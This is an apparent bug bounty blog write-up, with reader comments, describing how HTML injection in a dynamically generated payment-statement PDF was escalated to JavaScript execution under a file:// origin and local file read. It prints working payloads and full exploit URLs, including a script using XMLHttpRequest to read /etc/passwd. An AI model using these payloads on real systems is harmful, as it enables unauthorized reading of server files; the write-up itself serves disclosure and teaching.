Local File Read via XSS in Dynamically Generated PDF

REDIRECTING TO THE NEW BLOG ...

Hello Hunters,
                        This time I am writing about a Vulnerability found in another private program(xyz.com) on Bugcrowd which at first I thought wasn't much harmful(P4) but later escalated it to a P1.

While browsing the Application I came across an endpoint which allowed us to download some kind of Payment Statements as PDF.

The URL looked like this

https://xyz.com/payments/downloadStatements?Id=b9bc3d&utrnumber=xyz&date=2017-08-11&settlement_type=all&advice_id=undefined

I saw that the Value of utr number is reflected inside the PDF file that got downloaded so I wrote some HTML in utrnumber parameter as "><S>aaa 

https://xyz.com/payments/downloadStatements?Id=b9bc3d&utrnumber="><S>aaa &date=2017-08-11&settlement_type=all&advice_id=undefined

Upon opening this PDF I found that the HTML was rendered and could be seen in PDF. This kind of vulnerability usually leads to XSS but this time it was inside a PDF which was being generated dynamically.
If you want to learn more about XSS then I advise to checkout this great intro on XSS: https://www.aptive.co.uk/blog/xss-cross-site-scripting/

I tried if I could use an iframe and load internal domains in the frame or if I could iframe file:///etc/passwd but none of the tricks worked! also, I wasn't able to iframe external domains.

https://xyz.com/payments/downloadStatements?Id=b9bc3d&utrnumber="><iframe src="http://localhost"></iframe>&date=2017-08-11&settlement_type=all&advice_id=undefined


But, from now I didn't know if I could go further because I wasn't sure if javascript could be executed like this in PDF.So after playing around a lot I found that we could execute javascript with the help of DOM Manipulation

<p id="test">aa</p><script>document.getElementById('test').innerHTML+='aa'</script> 

https://xyz.com/payments/downloadStatements?Id=b9bc3d&utrnumber=<p id="test">aa</p><script>document.getElementById('test').innerHTML+='aa'</script>&date=2017-08-11&settlement_type=all&advice_id=undefined

and Upon downloading PDF I found that it contained the "aaaa" :D

also sometime later, I found that I could also use document.write() function to show results more easily.

<img src=x onerror=document.write('aaaa')>

https://xyz.com/payments/downloadStatements?Id=b9bc3d&utrnumber=<img src=x onerror=document.write('aaaa')>&date=2017-08-11&settlement_type=all&advice_id=undefined

after this I checked the window.location of where this javascript is executed and to my surprise it was executing in file:// origin on the Server

https://xyz.com/payments/downloadStatements?Id=b9bc3d&utrnumber=<img src=x onerror=document.write('aaaa'%2bwindow.location)>&date=2017-08-11&settlement_type=all&advice_id=undefined


Now since its executing on file://, I tried if we could access file:///etc/passwd via XHR(XMLHttpRequest), I wasn't sure myself.

<script>
x=new XMLHttpRequest;
x.onload=function(){
document.write(this.responseText)
};
x.open("GET","file:///etc/passwd");
x.send();
</script> 


https://xyz.com/payments/downloadStatements?Id=b9bc3d&utrnumber=<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>&date=2017-08-11&settlement_type=all&advice_id=undefined

and then you know ;) 



so That was it, XSS in Server Side Generated PDFs to Local File Read! 

However, it took :P me some time to figure this You could see the number of PDFs I had to download: 




./peace
Rahul Maini


Comments

  1. Nice, I use this today in an engagement. Awesome finding

    ReplyDelete
    Replies
    1. Does this lead to probably ssrf too?

      Delete
    2. Thanks :) Actually yea it leads to a SSRF but since it was executing under file:/// , and I don't may be thats why I wasn't able to load/iframe any of the http:// origin but should work in other cases like you might check this awesome blogpost by @bbuerhaus https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/

      Delete
    3. hi
      i found same case and there is ssrf and server downloads file from my http server. But problem is that i am not able to exploit LFI

      Delete
  2. need ur help can i contact u

    ReplyDelete
  3. The person merely uploads the picture that they need transformed and the net picture converter renders the picture and makes it accessible for obtain. Like all picture vectorizer applications, they range in high quality, pace, options and price. If you want to learn more about this topic please visit onlineconvertfree.com

    ReplyDelete
  4. here from HTB, thanks a lot!

    ReplyDelete
  5. This comment has been removed by the author.

    ReplyDelete
  6. j.aadithya techusa is #1: vapt services in usa https://www.algotradeusa.com/

    ReplyDelete
  7. Cross-site scripting attacks, often abbreviated as XSS, are a type of attack in http://casitabuilderlasvegas.com/

    ReplyDelete
  8. A self-hosted WordPress site gives you the opportunity to earn more and become a successful Internet marketer. Take the first step today by getting a beginner WordPress course. best course to learn R programming

    ReplyDelete

Post a Comment

Popular Posts